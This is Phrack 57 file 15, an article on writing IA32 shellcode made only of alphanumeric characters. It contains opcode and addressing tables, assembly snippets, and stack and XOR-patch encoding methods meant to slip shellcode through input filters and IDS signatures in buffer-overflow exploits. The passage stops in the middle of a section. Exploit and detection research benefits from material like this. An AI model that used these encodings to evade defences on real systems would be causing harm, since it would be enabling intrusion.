AOH :: P57-0X0F.TXT

Phrack 57 File 15: Writing ia32 alphanumeric shellcodes



                             ==Phrack Inc.==

               Volume 0x0b, Issue 0x39, Phile #0x0f of 0x12

|=--------------=[ Writing ia32 alphanumeric shellcodes ]=---------------=|
|=-----------------------------------------------------------------------=|
|=--------------------------=[ rix@hert.org ]=---------------------------=|



----| Introduction


Today, more and more exploits need to be written using assembler,
particularly to write classical shellcodes (for buffer overflows, or
format string attacks,...).

Many programs now achieve powerfull input filtering, using functions like
strspn() or strcspn(): it prevents people from easily inserting shellcodes
in different buffers.
In the same way, we observe more and more IDS detecting suspicious
opcodes sequences, some of them indicating the presence of a shellcode.

One way to evade such pattern matching techniques is to use polymorphic
stuff, like using tools such as K2's ADMmutate.
Another way to do this is going to be presented here: we'll try to write
IA32 non filterable shellcodes, using only alphanumeric chars: more
precisely, we'll use only chars like '0'->'9','A'->'Z' and 'a'->'z'.

If we can write such alphanumeric shellcodes, we will be able to store our
shellcodes nearly everywhere! Let's enumerate some interesting
possibilities:
- filtered inputs
- environment variables
- classical commands, instructions & parameters from usual protocols
- filenames & directories
- usernames & passwords
- ...



----| The usable instructions


Before beginning to think about particular techniques, let's first have a
look at the IA32 instructions that will be interesting for us.

First of all, some conventions (from Intel references) that we'll use in
our summary arrays:
 <r8>          : indicates a byte register.
 <r32>         : indicates a doubleword register.
 <r/m8>        : indicates a byte register or a byte from memory (through
                 a pointer).
 <r/m32>       : indicates a doubleword register or a doubleword from
                 memory (through a pointer).
 </r>          : indicates that the instruction byte is followed of
                 possibly several operand bytes. One of those bytes, the
                 "ModR/M byte", permits us to specify the used addressing
                 form,with the help of 3 bit fields.

                     ModR/M byte:                 
                     
                    7 6 5 4 3 2 1 0 
                   +---+-----+-----+
                   |mod|  r  | r/m |
                   +---+-----+-----+
                   
                 In this case, the </r> indicates us the ModR/M byte will
                 contain a register operand and a register or memory
                 operand.
 <imm8>        : indicates an immediate byte value.
 <imm32>       : indicates an immediate doubleword value.
 <disp8>       : indicates a signed 8 bits displacement.
 <disp32>      : indicates a signed 32 bits displacement.
 <...>         : indicates the instruction possibly need some operands
                 (eventually encoded on several operand bytes).


ALPHANUMERIC OPCODES:

Now, let's remember all instructions with alphanumeric opcodes:

hexadecimal opcode | char | instruction                    | interesting
-------------------+------+--------------------------------+------------
30 </r>            | '0'  | xor <r/m8>,<r8>                | YES
31 </r>            | '1'  | xor <r/m32>,<r32>              | YES
32 </r>            | '2'  | xor <r8>,<r/m8>                | YES
33 </r>            | '3'  | xor <r32>,<r/m32>              | YES
34 <imm8>          | '4'  | xor al,<imm8>                  | YES
35 <imm32>         | '5'  | xor eax,<imm32>                | YES
36                 | '6'  | ss:   (Segment Override Prefix)|
37                 | '7'  | aaa                            |
38 </r>            | '8'  | cmp <r/m8>,<r8>                | YES
39 </r>            | '9'  | cmp <r/m32>,<r32>              | YES
                   |      |                                |
41                 | 'A'  | inc ecx                        | YES
42                 | 'B'  | inc edx                        | YES
43                 | 'C'  | inc ebx                        | YES
44                 | 'D'  | inc esp                        | YES
45                 | 'E'  | inc ebp                        | YES
46                 | 'F'  | inc esi                        | YES
47                 | 'G'  | inc edi                        | YES
48                 | 'H'  | dec eax                        | YES
49                 | 'I'  | dec ecx                        | YES
4A                 | 'J'  | dec edx                        | YES
4B                 | 'K'  | dec ebx                        | YES
4C                 | 'L'  | dec esp                        | YES
4D                 | 'M'  | dec ebp                        | YES
4E                 | 'N'  | dec esi                        | YES
4F                 | 'O'  | dec edi                        | YES
50                 | 'P'  | push eax                       | YES
51                 | 'Q'  | push ecx                       | YES
52                 | 'R'  | push edx                       | YES
53                 | 'S'  | push ebx                       | YES
54                 | 'T'  | push esp                       | YES
55                 | 'U'  | push ebp                       | YES
56                 | 'V'  | push esi                       | YES
57                 | 'W'  | push edi                       | YES
58                 | 'X'  | pop eax                        | YES
59                 | 'Y'  | pop ecx                        | YES
5A                 | 'Z'  | pop edx                        | YES
                   |      |                                |
61                 | 'a'  | popa                           | YES
62 <...>           | 'b'  | bound <...>                    |
63 <...>           | 'c'  | arpl <...>                     |
64                 | 'd'  | fs:   (Segment Override Prefix)|
65                 | 'e'  | gs:   (Segment Override Prefix)|
66                 | 'f'  | o16:    (Operand Size Override)| YES
67                 | 'g'  | a16:    (Address Size Override)|
68 <imm32>         | 'h'  | push <imm32>                   | YES
69 <...>           | 'i'  | imul <...>                     | 
6A <imm8>          | 'j'  | push <imm8>                    | YES
6B <...>           | 'k'  | imul <...>                     |
6C <...>           | 'l'  | insb <...>                     |
6D <...>           | 'm'  | insd <...>                     |
6E <...>           | 'n'  | outsb <...>                    |
6F <...>           | 'o'  | outsd <...>                    |
70 <disp8>         | 'p'  | jo <disp8>                     | YES
71 <disp8>         | 'q'  | jno <disp8>                    | YES
72 <disp8>         | 'r'  | jb <disp8>                     | YES
73 <disp8>         | 's'  | jae <disp8>                    | YES
74 <disp8>         | 't'  | je <disp8>                     | YES
75 <disp8>         | 'u'  | jne <disp8>                    | YES
76 <disp8>         | 'v'  | jbe <disp8>                    | YES
77 <disp8>         | 'w'  | ja <disp8>                     | YES
78 <disp8>         | 'x'  | js <disp8>                     | YES
79 <disp8>         | 'y'  | jns <disp8>                    | YES
7A <disp8>         | 'z'  | jp <disp8>                     | YES

What can we directly deduct of all this?

- NO "MOV" INSTRUCTIONS:
 => we need to find another way to manipulate our data.
- NO INTERESTING ARITHMETIC INSTRUCTIONS ("ADD","SUB",...):
 => we can only use DEC and INC.
 => we can't use INC with the EAX register.
- THE "XOR" INSTRUCTION:
 => we can use XOR with bytes and doublewords.
 => very interesting for basic crypto stuff. 
- "PUSH"/"POP"/"POPAD" INSTRUCTIONS:
 => we can push bytes and doublewords directly on the stack.
 => we can only use POP with the EAX,ECX and EDX registers.
 => it seems we're going to play again with the stack.
- THE "O16" OPERAND SIZE OVERRIDE:
 => we can also achieve 16 bits manipulations with this instruction
    prefix.
- "JMP" AND "CMP" INSTRUCTIONS:
 => we can realize some comparisons.
 => we can't directly use constant values with CMP.


Besides, Don't forget that operands of these instructions (</r>, <imm8>,
<imm32>, <disp8> and <disp32>) must also remain alphanumeric. It may
make our task once again more complicated...


THE "ModR/M" BYTE:

For example, let's observe the effect of this supplementary constraint on
the ModR/M byte (</r>), particularly for XOR and CMP.
In the next array, we'll find all the possible values for this ModR/M
byte, and their interpretation as <r8>/<r32> (first row) and <r/m> (first
column) operands.

           <r8>:|  al  |  cl  |  dl  |  bl  |  ah  |  ch  |  dh  |  bh 
          <r32>:| eax  | ecx  | edx  | ebx  | esp  | ebp  | esi  | edi
<r/m>           |      |      |      |      |      |      |      |
--:-------------+------+------+------+------+------+------+------+------
(mod=00)        |      |      |      |      |      |      |      |
[eax]           |00    |08    |10    |18    |20    |28    |30 '0'|38 '8'
[ecx]           |01    |09    |11    |19    |21    |29    |31 '1'|39 '9'
[edx]           |02    |0A    |12    |1A    |22    |2A    |32 '2'|3A
[ebx]           |03    |0B    |13    |1B    |23    |2B    |33 '3'|3B
[<SIB>]         |04    |0C    |14    |1C    |24    |2C    |34 '4'|3C
[<disp32>]      |05    |0D    |15    |1D    |25    |2D    |35 '5'|3D
[esi]           |06    |0E    |16    |1E    |26    |2E    |36 '6'|3E
[edi]           |07    |0F    |17    |1F    |27    |2F    |37 '7'|3F
----------------+------+------+------+------+------+------+------+------
(mod=01)        |      |      |      |      |      |      |      |
[eax+<disp8>]   |40    |48 'H'|50 'P'|58 'X'|60    |68 'h'|70 'p'|78 'x'
[ecx+<disp8>]   |41 'A'|49 'I'|51 'Q'|59 'Y'|61 'a'|69 'i'|71 'q'|79 'y'
[edx+<disp8>]   |42 'B'|4A 'J'|52 'R'|5A 'Z'|62 'b'|6A 'j'|72 'r'|7A 'z'
[ebx+<disp8>]   |43 'C'|4B 'K'|53 'S'|5B    |63 'c'|6B 'k'|73 's'|7B
[<SIB>+<disp8>] |44 'D'|4C 'L'|54 'T'|5C    |64 'd'|6C 'l'|74 't'|7C
[ebp+<disp8>]   |45 'E'|4D 'M'|55 'U'|5D    |65 'e'|6D 'm'|75 'u'|7D
[esi+<disp8>]   |46 'F'|4E 'N'|56 'V'|5E    |66 'f'|6E 'n'|76 'v'|7E
[edi+<disp8>]   |47 'G'|4F 'O'|57 'W'|5F    |67 'g'|6F 'o'|77 'w'|7F
----------------+------+------+------+------+------+------+------+------
(mod=10)        |      |      |      |      |      |      |      |
[eax+<disp32>]  |80    |88    |90    |98    |A0    |A8    |B0    |B8
[ecx+<disp32>]  |81    |89    |91    |99    |A1    |A9    |B1    |B9
[edx+<disp32>]  |82    |8A    |92    |9A    |A2    |AA    |B2    |BA
[ebx+<disp32>]  |83    |8B    |93    |9B    |A3    |AB    |B3    |BB
[<SIB>+<disp32>]|84    |8C    |94    |9C    |A4    |AC    |B4    |BC
[ebp+<disp32>]  |85    |8D    |95    |9D    |A5    |AD    |B5    |BD
[esi+<disp32>]  |86    |8E    |96    |9E    |A6    |AE    |B6    |BE
[edi+<disp32>]  |87    |8F    |97    |9F    |A7    |AF    |B7    |BF
---+------------+------+------+------+------+------+------+------+------
(mod=11)        |      |      |      |      |      |      |      |
al | eax        |C0    |C8    |D0    |D8    |E0    |E8    |F0    |F8
cl | ecx        |C1    |C9    |D1    |D9    |E1    |E9    |F1    |F9
dl | edx        |C2    |CA    |D2    |DA    |E2    |EA    |F2    |FA
bl | ebx        |C3    |CB    |D3    |DB    |E3    |EB    |F3    |FB
ah | esp        |C4    |CC    |D4    |DC    |E4    |EC    |F4    |FC
ch | ebp        |C5    |CD    |D5    |DD    |E5    |ED    |F5    |FD
dh | esi        |C6    |CE    |D6    |DE    |E6    |EE    |F6    |FE
bh | edi        |C7    |CF    |D7    |DF    |E7    |EF    |F7    |FF

What can we deduct this time for XOR and CMP?

- SOME "xor [<r32>],dh" AND "xor [<r32>],bh" INSTRUCTIONS.
- THE "xor [<disp32>],dh" INSTRUCTION.
- SOME "xor [<r32>+<disp8>],<r8>" INSTRUCTIONS.
- NO "xor <r8>,<r8>" INSTRUCTIONS.

- SOME "xor [<r32>],esi" AND "xor [<r32>],edi" INSTRUCTIONS.
- THE "xor [<disp32>],esi" INSTRUCTION.
- SOME "xor [<r32>+<disp8>],<r32>" INSTRUCTIONS.
- NO "xor <r32>,<r32>" INSTRUCTIONS.

- SOME "xor dh,[<r32>]" AND "xor bh,[<r32>]" INSTRUCTIONS.
- THE "xor dh,[<disp32>]" INSTRUCTION.
- SOME "xor <r8>,[<r32>+<disp8>]" INSTRUCTIONS.

- SOME "xor esi,[<r32>]" AND "xor edi,[<r32>]" INSTRUCTIONS.
- THE "xor esi,[<disp32>]" INSTRUCTION.
- SOME "xor <r32>,[<r32>+<disp8>]" INSTRUCTIONS.

- SOME "cmp [<r32>],dh" AND "cmp [<r32>],bh" INSTRUCTIONS.
- THE "cmp [<disp32>],dh" INSTRUCTION.
- SOME "cmp [<r32>+<disp8>],<r8>" INSTRUCTIONS.
- NO "cmp <r8>,<r8>" INSTRUCTIONS.

- SOME "cmp [<r32>],esi" AND "cmp [<r32>],edi" INSTRUCTIONS.
- THE "cmp [<disp32>],esi" INSTRUCTION.
- SOME "cmp [<r32>+<disp8>],<r32>" INSTRUCTIONS.
- NO "cmp <r32>,<r32>" INSTRUCTIONS.


THE "SIB" BYTE:

To be complete, we must also analyze possibilities offered by the Scale
Index Base byte ("<SIB>" in our last array). This SIB byte allows us to
create addresses having the following form:
 <SIB> = <base>+(2^<scale>)*<index>
Where:
 <base>  : indicate a base register.
 <index> : indicate an index register.
 <scale> : indicate a scale factor for the index register.

Here are the different bit fields of this byte:

  7 6 5 4 3 2 1 0 
 +---+-----+-----+
 |sc.|index|base |
 +---+-----+-----+

Let's have a look at this last array:

    <base>:| eax  | ecx  | edx  | ebx  | esp  | ebp  | esi  | edi
           |      |      |      |      |      | (if  |      |
(2^<scale>)|      |      |      |      |      |  MOD |      |
*<index>   |      |      |      |      |      | !=00)|      |
----:------+------+------+------+------+------+------+------+------
eax        |00    |01    |02    |03    |04    |05    |06    |07
ecx        |08    |09    |0A    |0B    |0C    |0D    |0E    |0F
edx        |10    |11    |12    |13    |14    |15    |16    |17
ebx        |18    |19    |1A    |1B    |1C    |1D    |1E    |1F
0          |20    |21    |22    |23    |24    |25    |26    |27
ebp        |28    |29    |2A    |2B    |2C    |2D    |2E    |2F
esi        |30 '0'|31 '1'|32 '2'|33 '3'|34 '4'|35 '5'|36 '6'|37 '7'
edi        |38 '8'|39 '9'|3A    |3B    |3C    |3D    |3E    |3F
-----------+------+------+------+------+------+------+------+------
2*eax      |40    |41 'A'|42 'B'|43 'C'|44 'D'|45 'E'|46 'F'|47 'G'
2*ecx      |48 'H'|49 'I'|4A 'J'|4B 'K'|4C 'L'|4D 'M'|4E 'N'|4F 'O'
2*edx      |50 'P'|51 'Q'|52 'R'|53 'S'|54 'T'|55 'U'|56 'V'|57 'W'
2*ebx      |58 'X'|59 'Y'|5A 'Z'|5B    |5C    |5D    |5E    |5F
0          |60    |61 'a'|62 'b'|63 'c'|64 'd'|65 'e'|66 'f'|67 'g'
2*ebp      |68 'h'|69 'i'|6A 'j'|6B 'k'|6C 'l'|6D 'm'|6E 'n'|6F 'o'
2*esi      |70 'p'|71 'q'|72 'r'|73 's'|74 't'|75 'u'|76 'v'|77 'w'
2*edi      |78 'x'|79 'y'|7A 'z'|7B    |7C    |7D    |7E    |7F
-----------+------+------+------+------+------+------+------+------
4*eax      |80    |81    |82    |83    |84    |85    |86    |87
4*ecx      |88    |89    |8A    |8B    |8C    |8D    |8E    |8F
4*edx      |90    |91    |92    |93    |94    |95    |96    |97
4*ebx      |98    |99    |9A    |9B    |9C    |9D    |9E    |9F
0          |A0    |A1    |A2    |A3    |A4    |A5    |A6    |A7
4*ebp      |A8    |A9    |AA    |AB    |AC    |AD    |AE    |AF
4*esi      |B0    |B1    |B2    |B3    |B4    |B5    |B6    |B7
4*edi      |B8    |B9    |BA    |BB    |BC    |BD    |BE    |BF
-----------+------+------+------+------+------+------+------+------
8*eax      |C0    |C1    |C2    |C3    |C4    |C5    |C6    |C7
8*ecx      |C8    |C9    |CA    |CB    |CC    |CD    |CE    |CF
8*edx      |D0    |D1    |D2    |D3    |D4    |D5    |D6    |D7
8*ebx      |D8    |D9    |DA    |DB    |DC    |DD    |DE    |DF
0          |E0    |E1    |E2    |E3    |E4    |E5    |E6    |E7
8*ebp      |E8    |E9    |EA    |EB    |EC    |ED    |EE    |EF
8*esi      |F0    |F1    |F2    |F3    |F4    |F5    |F6    |F7
8*edi      |F8    |F9    |FA    |FB    |FC    |FD    |FE    |FF
-----------+------+------+------+------+------+------+------+------
(if <base> |
   ==ebp   | => <SIB> = <disp32>+(2^<scale>)*<index>
and MOD==0)|
-----------+-------------------------------------------------------

What can we deduct of this last array?
- SOME "<r32>+esi" SIB ADDRESSES.
- SOME "<r32>+2*<r32>" SIB ADDRESSES.
- NO "<r32>+4*<r32>" OR "<r32>+8*<r32>" SIB ADDRESSES.


Also remember that the usual bytes order for a full instruction with
possibly ModR/M, SIB byte and disp8/disp32 is:
 <opcode> [Mode R/M byte] [<SIB>] [<disp8>/<disp32>]


THE "XOR" INSTRUCTION:

We notice that we have some possibilities for the XOR instruction. Let's
remember briefly all possible logical combinations:

a | b | a XOR b (=c)
--+---+-------------
0 | 0 |    0
0 | 1 |    1
1 | 0 |    1
1 | 1 |    0

What can we deduct of this?
-  a XOR a = 0
 => we can easily initialize registers to 0.
-  0 XOR b = b
 => we can easily load values in registers containing 0.
-  1 XOR b = NOT b
 => we can easily invert values using registers containing 0xFFFFFFFF.
-  a XOR b = c
   b XOR c = a
   a XOR c = b
 => we can easily find a byte's XOR complement.



----| Classic manipulations


Now, we are going to see various methods permitting to achieve a maximum
of usual low level manipulations from the authorized instructions listed
above.


INITIALIZING REGISTERS WITH PARTICULAR VALUES:

First of all, let's think about a method allowing us to initialize some
very useful particular values in our registers, like 0 or 0xFFFFFFFF
(see alphanumeric_initialize_registers() in asc.c).
For example:

 push 'aaaa'                      ; 'a' 'a' 'a' 'a'
 pop eax                          ;EAX now contains 'aaaa'.
 xor eax,'aaaa'                   ;EAX now contains 0.

 dec eax                          ;EAX now contains 0xFFFFFFFF.

We are going to memorize those special values in particular registers, to
be able to use them easily.


INITIALIZING ALL REGISTERS:

At the beginning of our shellcode, we will need to initialize several
registers with values that we will probably use later.
Don't forget that we can't use POP with all registers (only EAX,ECX and
EDX) We will then use POPAD. For example, if we suppose EAX contain 0 and
ECX contain 'aaaa', we can initialize all our registers easily:

 push eax                         ;EAX will contain 0.
 push ecx                         ;no change to ECX ('aaaa').
 push esp                         ;EDX will contain ESP after POPAD.
 push eax                         ;EBX will contain 0.
 push esp                         ;no change to ESP.
 push ebp                         ;no change to EBP.
 push ecx                         ;ESI will contain 'aaaa' after POPAD.
 dec eax                          ;EAX will contain 0xFFFFFFFF.
 push eax                         ;EDI will contain 0xFFFFFFFF.
 popad                            ;we get all values from the stack.


COPYING FROM REGISTERS TO REGISTERS:

Using POPAD, we can also copy data from any register to any register, if
we can't PUSH/POP directly. For example, copying EAX to EBX:

 push eax                         ;no change.
 push ecx                         ;no change.
 push edx                         ;no change.
 push eax                         ;EBX will contain EAX after POPAD.
 push eax                         ;no change (ESP not "poped").
 push ebp                         ;no change.
 push esi                         ;no change.
 push edi                         ;no change.
 popad

Let's note that the ESP's value is changed before the PUSH since we have 2
PUSH preceding it, but POPAD POP all registers except ESP from the stack.


SIMULATING A "NOT" INSTRUCTION:

By using XOR, we can easily realize a classical NOT instruction. Suppose
EAX contains the value we want to invert, and EDI contains 0xFFFFFFFF:

 push eax                         ;we push the value we want to invert.
 push esp                         ;we push the offset of the value we
                                  ; pushed on the stack.
 pop ecx                          ;ECX now contains this offset.
 xor [ecx],edi                    ;we invert the value.
 pop eax                          ;we get it back in EAX.


READING BYTES FROM MEMORY TO A REGISTER:

Once again, by using XOR and the 0 value (here in EAX), we can read an
arbitrary byte into DH:

 push eax                         ;we push 0 on the stack.
 pop edx                          ;we get it back in ECX (DH is now 0).
 xor dh,[esi]                     ;we read our byte using [esi] as source
                                  ;address.                              

We can also read values not far from [esp] on the stack, by using DEC/INC
on ESP, and then using a classical POP.


WRITING ALPHANUMERIC BYTES TO MEMORY:

If we need a small place to write bytes, we can easily use PUSH and write
our bytes by decreasing memory addresses and playing with INC on ESP.

 push 'cdef'                      ;                 'c' 'd' 'e' 'f'
 push 'XXab'                      ; 'X' 'X' 'a' 'b' 'c' 'd' 'e' 'f'
 inc esp                          ;     'X' 'a' 'b' 'c' 'd' 'e' 'f'
 inc esp                          ;         'a' 'b' 'c' 'd' 'e' 'f'

Now, ESP points at a "abcdef" string written on the stack...
We can also use the 016 instruction prefix to directly push a 16 bits
value:

 push 'cdef'                      ;         'c' 'd' 'e' 'f'
 push 'ab'                        ; 'a' 'b' 'c' 'd' 'e' 'f'



----| The methods


Now, let's combine some of these interesting manipulations to effectively
generate alphanumeric shellcodes .
We are going to generate an alphanumeric engine, that will build our
original (non-alphanumeric) shellcode. We will propose 2 different
techniques:


USING THE STACK:

Because we have a set of instructions related to the stack, we are going
to use them efficiently.
In fact, we are going to construct our original code gradually while
pushing values on the stack, from the last byte (B1) of our original
shellcode to the first one (see alphanumeric_stack_generate() and
"-m stack" option in asc.c):

 .... 00  00  00  00  00  00  00  00  00  00  00  00  SS  SS  SS  SS ....

 .... 00  00  00  00  00  00  00  00  00  00  B2  B1  SS  SS  SS  SS ....
                                              <-----
 .... 00  00  00  00  00  00  00  B5  B4  B3  B2  B1  SS  SS  SS  SS ....
                                  <-----------------
 .... 00  00  00  B9  B8  B7  B6  B5  B4  B3  B2  B1  SS  SS  SS  SS ....
                  <-------original shellcode--------

Where: SS represents bytes already present on the stack.
       00 represents non used bytes on the stack.
       Bx represents bytes of our original non-alphanumeric shellcode.

It is really easy, because we have instructions to push doublewords or
words, and we can also play with INC ESP to simply push a byte.
The problem is that we cannot directly push non-alphanumeric bytes. Let's
try to classify bytes of our original code in different categories.
(see alphanumeric_stack_get_category() in asc.c).
We can thus write tiny blocks of 1,2,3 or 4 bytes from the same category
on the stack (see alphanumeric_stack_generate_push() in asc.c).
Let's observe how to realize that:

- CATEGORY_00:
 We suppose the register (<r>,<r32>,<r16>) contains the 0xFFFFFFFF value.
 
  1 BYTE:
   inc <r32>                      ;<r32> now contains 0.
   push <r16>                     ; 00  00
   inc esp                        ;     00
   dec <r32>                      ;<r32> now contains 0xFFFFFFFF.
   
  2 BYTES:
   inc <r32>                      ;<r32> now contains 0.
   push <r16>                     ; 00  00
   dec <r32>                      ;<r32> now contains 0xFFFFFFFF.   

  3 BYTES:
   inc <r32>                      ;<r32> now contains 0.
   push <r32>                     ; 00  00  00  00
   inc esp                        ;     00  00  00
   dec <r32>                      ;<r32> now contains 0xFFFFFFFF.      

  4 BYTES:
   inc <r32>                      ;<r32> now contains 0.
   push <r32>                     ; 00  00  00  00
   dec <r32>                      ;<r32> now contains 0xFFFFFFFF.      

- CATEGORY_FF:
 We use the same mechanism as for CATEGORY_00, except that we don't need
 to INC/DEC the register containing 0xFFFFFFFF.
 
- CATEGORY_ALPHA:
 We simply push the alphanumeric values on the stack, possibly using a
 random alphanumeric byte "??" to fill the doubleword or the word.
 
  1 BYTE:
   push 0x??B1                    ; ??  B1
   inc esp                        ;     B1

  2 BYTES:
   push 0xB2B1                    ; B2  B1

  3 BYTES:
   push 0x??B3B2B1                ; ??  B3  B2  B1
   inc esp                        ;     B3  B2  B1

  4 BYTES:
   push 0xB4B3B2B1                ; B4  B3  B2  B1    

- CATEGORY_XOR:
 We choose random alphanumeric bytes X1,X2,X3,X4 and Y1,Y2,Y3,Y4, so that
 X1 xor Y1 = B1, X2 xor Y2 = B2, X3 xor Y3 = B3 and X4 xor Y4 = B4
 (see alphanumeric_get_complement() in asc.c).

  1 BYTE:
   push 0x??X1                    ; ??  X1
   pop ax                         ;AX now contains 0x??X1.
   xor ax,0x??Y1                  ;AX now contains 0x??B1.
   push ax                        ; ??  B1
   inc esp                        ;     B1
  
  2 BYTES:
   push 0xX2X1                    ; X2  X1
   pop ax                         ;AX now contains 0xX2X1.
   xor ax,0xY2Y1                  ;AX now contains 0xB2B1.
   push ax                        ; B2  B1

  3 BYTES:
   push 0x??X3X2X1                ; ??  X3  X2  X1
   pop eax                        ;EAX now contains 0x??X3X2X1.
   xor eax,0x??Y3Y2Y1             ;EAX now contains 0x??B3B2B1.
   push eax                       ; ??  B3  B2  B1
   inc eax                        ;     B3  B2  B1

  4 BYTES:
   push 0xX4X3X2X1                ; X4  X3  X2  X1
   pop eax                        ;EAX now contains 0xX4X3X2X1.
   xor eax,0xY4Y3Y2Y1             ;EAX now contains 0xB4B3B2B1.
   push eax                       ; B4  B3  B2  B1

- CATEGORY_ALPHA_NOT and CATEGORY_XOR_NOT:
 We simply generate CATEGORY_ALPHA and CATEGORY_XOR bytes (N1,N2,N3,N4) by
 realizing a NOT operation on the original value. We must then cancel the
 effect of this operation, by realizing again a NOT operation but this
 time on the stack (see alphanumeric_stack_generate_not() in asc.c).

  1 BYTE:
   push esp
   pop ecx                        ;ECX now contains ESP.
                                  ; N1
   xor [ecx],<r8>                 ; B1

  2 BYTES:
   push esp
   pop ecx                        ;ECX now contains ESP.
                                  ; N2  N1
   xor [ecx],<r16>                ; B2  B1

  3 BYTES:
   push esp
   pop ecx                        ;ECX now contains ESP.
                                  ;     N3  N2  N1
   dec ecx                        ; ??  N3  N2  N1
   xor [ecx],<r32>                ; ??  B3  B2  B1
   inc ecx                        ;     B3  B2  B1

  4 BYTES:
   push esp
   pop ecx                        ;ECX now contains ESP.
                                  ; N4  N3  N2  N1
   xor [ecx],<r32>                ; B4  B3  B2  B1

While adding each of these small codes, with the appropriate values, to
our alphanumeric shellcode, we'll generate an alphanumeric shellcode wich
will build our non-alphanumeric shellcode on the stack.


USING "XOR PATCHES":

Another possibility is to take advantage of an interesting addressing
mode, using both ModR/M and SIB bytes in combination with the following
XOR instruction (see alphanumeric_patches_generate_xor() and "-m patches"
option in asc.c):

 xor [<base>+2*<index>+<disp8>],<r8>
 xor [<base>+2*<index>+<disp8>],<r16> 
 xor [<base>+2*<index>+<disp8>],<r32>

Suppose we have such an architecture for our shellcode:

 [initialization][patcher][               data                ]

We can initialize some values and registers in [initialization], then use
XOR instructions in [patcher] to patch bytes in [data]:
(see alphanumeric_patches_generate() in asc.c)

 [initialization][patcher][original non-alphanumeric shellcode]

To use this technique, we need to know the starting address of our
shellcode. We can store it in a <base> register, like EBX or EDI.
We must then calculate the offset for the first non-alphanumeric byte to
patch, and generate this offset again by using an <index> register and an
alphanumeric <disp8> value:

 [initialization][patcher][original non-alphanumeric shellcode]
  |                        |
<base>         <base>+2*<index>+<disp8>

The main issue here is that our offset is going to depend on the length
of our [initialization] and [patcher]. Besides, this offset is not
necessarily alphanumeric. Therefore, we'll generate this offset in
[initialization], by writing it on the stack with our previous technique.

We'll try to generate the smallest possible [initialization], by
increasing gradually an arbitrary offset, trying to store the code to
calculate it in [initialization], and possibly add some padding bytes
(see alphanumeric_patches_generate_initialization() in asc.c):

 First iteration:
  [######################][patcher][data]
                           |
                         offset                         
  [code to generate this offset] => too big.

 Second iteration:
  [##########################][patcher][data]
                               |
                         --->offset                         
  [  code to generate this offset  ] => too big.

 Nth iteration:
  [#######################################][patcher][data]
                                            |
                         ---------------->offset
  [ code to generate this offset ] => perfect.

 Adding some padding bytes:
  [#######################################][patcher][data]
                                            |
                         ---------------->offset
  [ code to generate this offset ][padding] => to get the exact size.

 And finally the compiled shellcode:
  [ code to generate the offset  ][padding][patcher][data]

We will also iterate on the <disp8> value, because some values can give us
an easy offset to generate.
What will contain the [data] at runtime ?
We will use exactly the same manipulations as for the "stack technique",
except that here, we can (we MUST !!!) have directly stored alphanumeric
values in our [data].

Another problem is that we can only use <r8>,<r16> or <r32> registers.
It prevents us to patch 3 bytes with only one XOR instruction without
modifying previous or next bytes.

Finally, once we patched some bytes, we must increment our offset to reach
the next bytes that we need to patch. We can simply increment our <base>,
or increment our <disp8> value if <disp8> is always alphanumeric.


To finish this description of the techniques, let's remember again that
we cannot use all registers and addressing modes... We can only use the
ones that are "alphanumeric compatibles". For example, in the "XOR
patching technique", we decided to use the following registers:

 <base> = ebx | edi
 <index> = ebp
 XOR register = eax | ecx
 NOT register = dl | dh | edx | esi

Let's note that those registers are randomly allocated, to add some
basic polymorphism abilities (see alphanumeric_get_register() in asc.c).



----| Some architectures and considerations


Now, we will analyze different general architectures and considerations to
generate alphanumeric shellcodes.


For the "XOR patching technique", the only constraint is that we need to
know the address of our shellcode. Usually this is trivial: we used this
address to overflow a return address. For example, if we overwrote a
return value, we can easily recover it at the beginning of our shellcode
(see alphanumeric_get_address_stack() and "-a stack" option in asc.c):

 dec esp
 dec esp
 dec esp
 dec esp
 pop <r32>

The address can also be stored in a register (see "-a <r32>" option in
asc.c). In this case, no preliminary manipulation will be necessary.


For the "stack technique", we can have different interesting
architectures, depending on the position of the buffer we try to smash.
Let's analyze some of them briefly.

If our shellcode is on the stack, followed by a sufficient space and by a
return address, this is really perfect. Let's look at what is going to
happen to our stack: 

 .... AA  AA  AA  AA  00  00  00  00  00  00  RR  RR  RR  RR  SS  SS ....
     [EIP]                                                   [ESP]

 .... AA  AA  AA  AA  00  00  00  00  00  00  RR  BB  BB  BB  SS  SS ....
      -->[EIP]                                   [ESP]<---------

Our non-alphanumeric shellcode gets down to meet the end of our compiled
shellcode. Once we have built our entire original shellcode, we can simply
build padding instructions to connect both shellcodes.

 .... AA  AA  AA  AA  PP  PP  PP  PP  PP  PP  RR  BB  BB  BB  SS  SS ....
      ------>[EIP]   [ESP]<-------------------------------------

 .... AA  AA  AA  AA  PP  PP  PP  PP  PP  PP  RR  BB  BB  BB  SS  SS ....
      -------------------------------------->[EIP]

Where: AA represents bytes of our alphanumeric compiled shellcode.
       00 represents non used positions on the stack.
       SS represents bytes already present on the stack.
       RR represents bytes of our return address.
       BB represents bytes of ou non-alphanumeric generated shellcode.
       PP represents bytes of simple padding instructions (ex: INC ECX).

To use this method, we must have an original shellcode with a smaller size
compared to the space between the end of our compiled shellcode and the
value of ESP at the beginning of the execution of our shellcode.
We must also be sure that the last manipulations on the stack (to generate
padding instructions) will not overwrite the last instructions of our
compiled shellcode. If we simply generate alphanumeric padding
instructions, it should not make any problems.
We can also add some padding instructions at the end of our alphanumeric
compiled shellcode, and let them be overwritten by our generated padding
instructions. This approach is interesting for brute forcing
(see "-s null" option in asc.c).

We can also proceed in a slightly different way, if the space between our
compiled shellcode and the original shellcode has an alphanumeric length
(<disp8> alphanumeric). We simply use 2 inverse conditional jumps, like
this:

 [end of our compiled shellcode]
 jo <disp8>+1 -+
               |
 jno <disp8> --+
               |
 ...           |
               |
label: <-------+
 [begin of our original non-alphanumeric shellcode]


We can also combine "stack" and "patches" techniques. We build our
original shellcode on the stack (1), and simply jump to it once built (3).
The problem is that we don't have alphanumeric jump instructions. We'll
generate a JMP ESP simply by using the "patches technique" (2) on one byte
(see "-s jmp" option in asc.c):

                                            +--patch (2)-+
                                            |            |
 [non-alphanumeric building code][JMP ESP patching code][jmp esp]
               |                                               |
 +-------------+---------jump (3)------------------------------+
 |             |
 |           build (1)
 |             |
 +-> [non-alphanumeric code]

We can also replace the JMP ESP by the following sequence, easier to
generate (see "-s ret" option in asc.c):

 push esp
 ret


Finally, we can generate yet another style of shellcode. Suppose we have a
really big non-alphanumeric shellcode. Perhaps is it more interesting to
compress it, and to write a small non-alphanumeric decompression engine
(see "-s call" option in asc.c):

                                            +--patch (2)--+
                                            |             |
 [non-alphanumeric building code][CALL ESP patching code][call esp][data]
               |                                                 |
